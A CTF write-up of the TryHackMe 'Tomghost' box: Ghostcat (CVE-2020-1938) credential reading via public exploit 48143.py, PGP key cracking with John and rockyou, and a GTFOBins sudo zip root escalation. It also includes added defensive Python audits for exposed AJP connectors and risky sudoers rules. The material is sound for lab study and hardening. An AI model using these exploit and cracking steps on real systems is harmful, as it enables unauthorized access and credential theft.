Swafox Blog

TryHackMe - Tomghost

Step 1 - Reconnaissance
The first step is to enumerate the machine. A simple Nmap service scan with the vulners script will do:
nmap -Pn -sV --script vulners <IP>
Nmap scan report for
Host is up (0.055s latency).
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
| vulners:
| cpe:/a:apache:tomcat:9.0.30:
|_ CVE-2020-1938 7.5 https://vulners.com/cve/CVE-2020-1938
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Step 2 - Web Exploitation
From the Nmap scan above, we can see that the box is vulnerable to CVE-2020-1938. A quick search shows that this version of Apache Tomcat is vulnerable to file reading/inclusion through the AJP connector on port 8009 (Ghostcat). The following exploit can allow us to read sensitive information, such as login credentials.
Download the exploit and run it using:
python 48143.py <IP>
You should see a similar output:
Getting resource at ajp13://<IP>/asdf
<?xml version="1.0" encoding="UTF-8"?>
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
See the License for the specific language governing permissions and
limitations under the License.
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
<display-name>Welcome to Tomcat</display-name>
Welcome to GhostCat
You should see the credentials at the end of the output.
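The finding behind this step is that the AJP connector was reachable from the network with no shared secret. The following audit is an added example for this write-up, not code from the original post or from Tomcat: it parses a server.xml and flags every AJP connector that is not bound to loopback or has no secret configured. The sample server.xml is constructed; the 8009 connector mirrors the weak pre-9.0.31 default and the 8019 one shows the hardened form. The `address`, `secret` and `secretRequired` attributes are the ones Tomcat documents for the AJP connector (the secret pair was introduced in 9.0.31).

```python
"""Check a Tomcat server.xml for AJP connectors exposed the way the Ghostcat
(CVE-2020-1938) target above was.

Added example for this write-up: not part of the original post or of Tomcat.
It only reads attributes Tomcat documents on the AJP connector:
'address' (unset means listen on every interface) and the 'secret' /
'secretRequired' pair added in 9.0.31.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed sample (not the box's real config). The 8009 connector mirrors the
# weak pre-9.0.31 default; the 8019 connector shows the hardened form.
SAMPLE_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000" redirectPort="8443" />
    <!-- exposed: no address, no secret -->
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <!-- hardened: loopback only, shared secret required -->
    <Connector port="8019" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="PLACEHOLDER-CHANGE-ME"
               redirectPort="8443" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" />
    </Engine>
  </Service>
</Server>
"""


def audit_ajp_connectors(server_xml: str) -> List[Dict[str, object]]:
    """Return one finding per AJP connector with the list of weaknesses found."""
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue  # HTTP/HTTPS connectors are out of scope here
        issues = []
        address = conn.get("address")
        if address is None or address not in LOOPBACK:
            issues.append("reachable from the network (no loopback 'address')")
        if not conn.get("secret"):
            issues.append("no shared 'secret' set")
        if conn.get("secretRequired", "true").lower() == "false":
            issues.append("secretRequired explicitly disabled")
        findings.append({"port": conn.get("port", "?"), "issues": issues})
    return findings


def exposed_ajp_ports(server_xml: str) -> List[str]:
    """Ports of AJP connectors that have at least one weakness."""
    return [f["port"] for f in audit_ajp_connectors(server_xml) if f["issues"]]


if __name__ == "__main__":
    for f in audit_ajp_connectors(SAMPLE_SERVER_XML):
        status = "OK" if not f["issues"] else "; ".join(f["issues"])
        print(f"AJP connector on port {f['port']}: {status}")
```

Run it against a real `conf/server.xml` by reading the file into `audit_ajp_connectors`. A connector that is not needed at all (no reverse proxy speaking AJP in front of Tomcat) is best removed from server.xml entirely rather than hardened.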
Step 3 - User.txt
Use the recovered credentials to log into the machine via SSH. After that, you can immediately get user.txt by browsing to **/home** and visiting another user's directory.
Step 4 - Horizontal privilege escalation
Go back to the initial user's home folder and take a look at what is there. There are exactly two files: **credential.pgp** and **tryhackme.asc**. As we can easily guess, those files will reveal some credentials (most likely for the second user). A simple Google search on PGP cracking led me to this article. This short guide tells us to crack the **.asc** file with John the Ripper and then use the recovered passphrase to open the PGP file.
Let's first convert the **.asc** file into a format John understands by running:
gpg2john tryhackme.asc > hash
Then all we need to do is run a rockyou-powered cracking session against the **hash** file:
john hash --wordlist=/usr/share/wordlists/rockyou.txt
A password will be revealed within a couple of seconds, and we can finally use it to open the **.pgp** file. Run the following command and enter the password when prompted:
gpg --import tryhackme.asc
You can now easily open the PGP file after importing the key.
gpg --decrypt credential.pgp
Bingo! We got the credentials. Now let's ssh into the box and enumerate there.
Step 5 - Root
**sudo -l** reveals that we can run **/usr/bin/zip** as root via sudo. This configuration is well known and is covered by GTFOBins. Link: https://gtfobins.github.io/gtfobins/zip/#sudo
Let's follow the guide from GTFOBins and get the root shell!
Done! We now have root access and can finally read **/root/root.txt**.
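The root step works because a sudoers rule grants a binary with a documented shell escape. As an added example for this write-up (not code from the original post or from GTFOBins), the script below parses sudoers user-specification lines and flags rules that grant `ALL` or a binary from a small, hand-picked subset of GTFOBins' sudo entries; `zip` is the one this page links, and the other names are assumed as illustrative entries. The sudoers text is a constructed sample with made-up usernames, not the box's real file.

```python
"""Flag sudoers rules that hand out binaries with a documented shell escape,
the misconfiguration the 'sudo -l' step above turns into a root shell.

Added example for this write-up; not part of the original post. KNOWN_ESCAPES
is a small hand-picked subset of GTFOBins' sudo entries (zip is the one the
page links); a real audit would load the full list from GTFOBins.
"""
import os
import re
from typing import List, Tuple

KNOWN_ESCAPES = {"zip", "vim", "find", "less", "awk", "python3"}

# Constructed sample with made-up users; not the box's real sudoers.
SAMPLE_SUDOERS = """\
# constructed sample, not the box's real sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
alice   ALL=(root) NOPASSWD: /usr/bin/zip
bob     ALL=(root) /usr/bin/cat /var/log/tomcat9/catalina.out, /usr/bin/find
carol   ALL=(root) /usr/sbin/service tomcat9 status
"""

SKIP_PREFIXES = ("Defaults", "@", "User_Alias", "Cmnd_Alias",
                 "Host_Alias", "Runas_Alias")


def parse_sudoers_commands(sudoers_text: str) -> List[Tuple[str, str]]:
    """Return (user_or_group, command) pairs from user-specification lines.

    Handles the common 'user host=(runas) [TAG:] cmd1, cmd2' shape; alias,
    include and Defaults lines are skipped.
    """
    rules = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith(SKIP_PREFIXES) or "=" not in line:
            continue
        user_spec, _, rhs = line.partition("=")
        user = user_spec.split()[0]                  # "alice ALL" -> "alice"
        rhs = re.sub(r"\([^)]*\)", "", rhs)          # strip the (runas) group
        rhs = re.sub(r"\b[A-Z]+:", "", rhs)          # strip NOPASSWD:, SETENV: ...
        for cmd in rhs.split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append((user, cmd.split()[0]))  # command path, no args
    return rules


def flag_shell_escapes(sudoers_text: str) -> List[Tuple[str, str]]:
    """Rules granting ALL, or a binary whose basename is in KNOWN_ESCAPES."""
    flagged = []
    for user, cmd in parse_sudoers_commands(sudoers_text):
        if cmd == "ALL" or os.path.basename(cmd) in KNOWN_ESCAPES:
            flagged.append((user, cmd))
    return flagged


if __name__ == "__main__":
    for user, cmd in flag_shell_escapes(SAMPLE_SUDOERS):
        print(f"{user}: {cmd} can be used to spawn a root shell")
```

In the sample, the rule for `alice` is the one that matches this box's situation; `carol`'s narrowly scoped `service` rule is not flagged, which is the shape a rule should take when a user genuinely needs one privileged action.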
Thank you for reading!